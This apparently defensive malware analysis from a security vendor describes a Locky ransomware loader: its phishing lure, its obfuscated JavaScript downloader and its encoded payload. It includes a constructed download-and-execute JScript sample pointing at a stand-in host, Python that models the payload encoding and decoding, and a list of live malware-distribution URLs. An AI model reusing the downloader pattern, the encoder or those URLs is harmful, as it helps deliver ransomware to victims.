Locky Ransomware Shipping With a New Loader


ReaQta has been monitoring a new and massive worldwide Locky ransomware spam campaign. The attacks are carried out in the usual way, a JavaScript file attached to an email message delivered to the victims, but this is the first campaign we have tracked that shows a different deployment behaviour. The JavaScript downloader usually retrieves Locky’s dropper directly from a compromised website, while in this case the downloaded file is encoded, making it harder for traditional protection solutions to spot the incoming threat.

[Image: Locky rigged email]

The spam campaign uses the subject line “New Invoice” with the following body:

Dear jean,

I appreciate your speaking with me today. Per our conversation, please find attached invoice.

Please do not hesitate to contact me with any questions you may have. Thank you for your time and consideration.

Sincerely,

Hollis Summers

Minerva Neurosciences, Inc

Phone: +1 (267) 351-85-20

The attachment is called INVOICE_jean.zip and contains the JavaScript file we analyzed (MD5: 2E747E682BEF95B559AC3F3D14C8B0E4), which had a 2/57 (3%) detection rate when it was first uploaded.

[Image: Locky downloader JS detection rate]

Javascript Analysis

For convenience we have created a gist with the original JavaScript code found inside the zip attachment. The script uses two obfuscation layers; the result after the first pass can be found here.

The second layer uses a large number of variables and function definitions to make the analysis harder:

var MUj = (HCs0 + (function Oa() {
    return CFo;
}()) + Qi, RQo + VTj(KRy) + Hn + LBRHp + JYk9 + JPo);

It is quite hard to understand what is going on, but after deobfuscating the second layer as well we finally obtain more readable code.

We can quickly spot the domains used to download Locky:

[Image: Locky distribution domains]

All of them appear to be compromised and used without the legitimate owner’s knowledge.

The initial download request happens through WinHttp.WinHttpRequest.5.1 instead of the usual MSXML2.XMLHTTP. Inside the do-while loop we find the part of the script that takes care of downloading, decoding and finally executing Locky’s dropper.

This is the code that checks whether or not the download is still in progress:

if (VFHu.readystate < 4) {   // request not yet complete
    WScript.Sleep(100);      // wait 100 ms
    continue;                // poll again on the next iteration of the do-while loop
}

When the download completes, the ResponseBody is saved, in this particular script, to %TEMP%/dEMCTgpxP.exe.
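The download loop described above leaves a small set of textual indicators (the WinHttp COM object, the readystate polling loop with WScript.Sleep, the ResponseBody access and an .exe path under %TEMP%) in the deobfuscated script. The following triage heuristic, an added example that is neither the original script nor ReaQta’s tooling, scores a script against those indicators; the two sample scripts and their identifiers are constructed, and the threshold is an assumption. It only works on deobfuscated source, since both obfuscation layers hide these strings until they are peeled off.

```python
import re

# Heuristic indicators drawn from the deobfuscated downloader described in
# the write-up.  Added example, not the original script or ReaQta's tooling.
INDICATORS = {
    "http_com_object": re.compile(r"WinHttp\.WinHttpRequest\.5\.1|MSXML2\.XMLHTTP", re.I),
    "readystate_poll": re.compile(r"readystate\s*<\s*4", re.I),
    "sleep_call":      re.compile(r"WScript\.Sleep\s*\(", re.I),
    "response_body":   re.compile(r"\bResponseBody\b", re.I),
    "temp_exe_path":   re.compile(r"%TEMP%[\\/][^\"'\s]*\.exe", re.I),
}


def scan_script(text: str) -> dict:
    """Return one boolean per indicator: does the script text match it?"""
    return {name: rx.search(text) is not None for name, rx in INDICATORS.items()}


def triage(text: str, threshold: int = 3) -> dict:
    """Count indicator hits and flag the script when they reach the threshold.

    Works on deobfuscated source only: the two obfuscation layers in the
    sample hide these strings until they are removed.
    """
    hits = scan_script(text)
    matched = sorted(name for name, hit in hits.items() if hit)
    return {"score": len(matched), "hits": matched, "suspicious": len(matched) >= threshold}


# Constructed stand-in for the deobfuscated downloader (identifiers and the
# host name are invented; saveAndDecode is a hypothetical helper).
SAMPLE_DOWNLOADER = r'''
var req = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
req.Open("GET", "http://compromised.example/xyz", true);
req.Send();
do {
    if (req.readystate < 4) {
        WScript.Sleep(100);
        continue;
    }
    var body = req.ResponseBody;
    var out = "%TEMP%/sample.exe";
    saveAndDecode(body, out);
    break;
} while (true);
'''

# Constructed benign script for comparison: reads a log file and echoes it.
SAMPLE_BENIGN = r'''
var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.OpenTextFile("C:\\logs\\app.log", 1);
while (!f.AtEndOfStream) WScript.Echo(f.ReadLine());
f.Close();
'''

if __name__ == "__main__":
    print(triage(SAMPLE_DOWNLOADER))   # all five indicators hit
    print(triage(SAMPLE_BENIGN))       # no hits
```

The score is deliberately coarse: a single indicator such as WScript.Sleep is common in legitimate administration scripts, so only the combination of the HTTP object, the polling loop and the executable written under %TEMP% is treated as suspicious.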

The picture below shows an excerpt of the ResponseBody containing the encoded file.

[Image: Locky new loader ResponseBody excerpt]

After the file has been saved to disk, a decoding function is executed to decrypt it before it is run.

[Image: Locky payload decoding]

JFSHm is the function responsible for reading the file content and for building an array that is decoded using ZUe, another array, as an S-box. The array returned by JFSHm is passed to the NWAq5 function, whose body applies the following decoding scheme:

  1. Four items are removed from the array at the position equal to the size of Bp.
  2. The resulting array is reversed.
  3. Finally, an XOR decryption with a dynamic key is applied.

[Image: Locky payload decryption]

Locky’s authors appear to be moving towards a more encryption-based approach that still looks immature, but is nevertheless effective at avoiding detection.

After these steps have been completed the script performs a few sanity checks: the size of the manipulated array must be no smaller than 153600 bytes and no larger than 179200 bytes, and a valid MZ signature must be present. At this point the decoded content goes through another substitution phase, applied by the KGa function, before being written to disk.
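To make the decoding scheme (S-box lookup, removal of four items at the Bp offset, reversal, XOR with a dynamic key) and the sanity checks that follow it concrete, here is an added analyst’s model of the pipeline. It is not the loader’s code or ReaQta’s tooling: the S-box, the key schedule, the Bp length and the fake dropper bytes are constructed stand-ins, because the real ZUe table, key and Bp value are not reproduced in this write-up. The encoder exists only so the decoder can be exercised on a constructed blob and checked for a round trip; the size window and the MZ check are the ones the script applies.

```python
# Constructed parameters.  The real ZUe S-box, XOR key schedule and Bp value
# are not reproduced in the write-up and would have to be lifted from the
# deobfuscated script; these stand-ins only exercise the shape of the scheme.
SBOX = bytes((i * 167 + 29) & 0xFF for i in range(256))   # a permutation: gcd(167, 256) == 1
_inv = bytearray(256)
for _plain, _sub in enumerate(SBOX):
    _inv[_sub] = _plain
INV_SBOX = bytes(_inv)

BP_SIZE = 16                          # stand-in for the length of Bp (the removal offset)
KEY_SEED = 0x5A                       # stand-in seed for the position-dependent XOR key
MIN_SIZE, MAX_SIZE = 153600, 179200   # size window from the script's sanity check


def rolling_key(i: int) -> int:
    """Constructed 'dynamic' key byte that changes with the byte position."""
    return (KEY_SEED + 7 * i) & 0xFF


def decode_payload(blob: bytes, bp_size: int = BP_SIZE) -> bytes:
    """Apply the described steps: S-box lookup, drop 4 items at Bp, reverse, XOR."""
    stage = bytearray(SBOX[b] for b in blob)                          # JFSHm: substitute through the S-box
    del stage[bp_size:bp_size + 4]                                    # NWAq5 step 1: remove 4 items at Bp
    stage.reverse()                                                   # NWAq5 step 2: reverse the array
    return bytes(b ^ rolling_key(i) for i, b in enumerate(stage))    # NWAq5 step 3: XOR with rolling key


def passes_sanity_checks(decoded: bytes) -> bool:
    """The size window and MZ signature the script verifies before writing to disk."""
    return MIN_SIZE <= len(decoded) <= MAX_SIZE and decoded[:2] == b"MZ"


def analyze(blob: bytes) -> dict:
    """Decode a blob and report what the loader's own checks would conclude."""
    decoded = decode_payload(blob)
    return {
        "decoded_size": len(decoded),
        "has_mz": decoded[:2] == b"MZ",
        "accepted": passes_sanity_checks(decoded),
    }


def encode_payload(payload: bytes, bp_size: int = BP_SIZE) -> bytes:
    """Exact inverse of decode_payload, used only to build constructed test blobs."""
    stage = bytearray(b ^ rolling_key(i) for i, b in enumerate(payload))
    stage.reverse()
    stage[bp_size:bp_size] = b"\0\0\0\0"                              # the 4 items the decoder discards
    return bytes(INV_SBOX[b] for b in stage)


def build_fake_pe(size: int) -> bytes:
    """Constructed stand-in for a dropper: an MZ header followed by filler bytes."""
    return b"MZ" + bytes((i * 31) & 0xFF for i in range(size - 2))


if __name__ == "__main__":
    good = encode_payload(build_fake_pe(160000))
    print(analyze(good))                                    # accepted: True
    print(analyze(encode_payload(build_fake_pe(4096))))     # below 153600 bytes: accepted False
    print(analyze(good[:-1] + bytes([good[-1] ^ 1])))       # last blob byte becomes the first decoded byte: MZ check fails
```

Two points worth noting from running it: because the array is reversed after the four items are dropped, the first bytes of the executable come from the tail of the downloaded blob, so a truncated or partially corrupted download fails the MZ check rather than producing a broken executable; and the size window alone rejects any response that is not roughly the size of the dropper, which is why a sandbox that serves a small decoy file in place of the real download never sees the second stage execute.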

[Image: Locky last substitution stage]

Finally, 123 is passed as an argument to the decoded file (MD5: 3A0AA8730FA9B0E71C23FF2921597B84) when it is launched. Without this parameter the dropper is unable to perform the unpacking process and get the payload running.

At upload time its detection rate was 13/55, or just 23%.

[Image: Locky new loader payload detection rate]

Compromised Domains

This is the list of compromised domains we have retrieved while tracking this campaign:

80.244.134.169/ xyvg0g
933666.net/ ttfzuba
asliaypak.com/ xbyemr78
bani-shehr.org/ 3aoopl3
compa.me/ 94nyc
dermadom.com.mx/ sbee4fy
gkabiye.com/ j0vyirf
haiphongict.com/ ppw5p
heavenboundministry.com/ 5uenput
iminlife.com/ 362wz
indianflowers.org/ qhg1i
infobroadband.com/ ztbk7y1
jade-palace.com/ 1ywwhsx
mvfashionoutlet.com/ o9x0720h
mybootstore.com/ fgj69p
officeconnectme.com/ o6077arl
qasralawani.com/ nu7pd
rasberrie.com/ mvmaas
risefallsinkswim.com/ u6gcc5ux
romantikbutik.com/ rd0j2w
sevvalsenturk.com/ 1iaqn
shoopinghere.com/ nm1aticp
shopapm.com/ dfied
shubhkamnaye.in/ k6urzuq
smoochintimates.com.au/ gfwdo0c
sportsandwine.com.au/ jilh5cck
temadanismanlik.net/ ceup52n
theguildedquill.com/ 9wt3fn
u-flats.com/ x147vd
wbksis.com/ wzmgallo
www.iminlife.com/ 362wz
www.nirmallifeline.com/ o62sz
www.sportskart.co/ lufy0

Conclusion

The cat and mouse game between ransomware and protection solutions is still raging, with ransomware authors adopting slightly more sophisticated techniques that, judging by detection rates, are proving successful. Ransomware, despite its intrinsic simplicity, remains a feared threat that is proving hard to contain for small companies and big corporations alike. If your company has been hit by ransomware and you’re looking for a proven and effective ransomware protection, you might want to check out ReaQta-core.
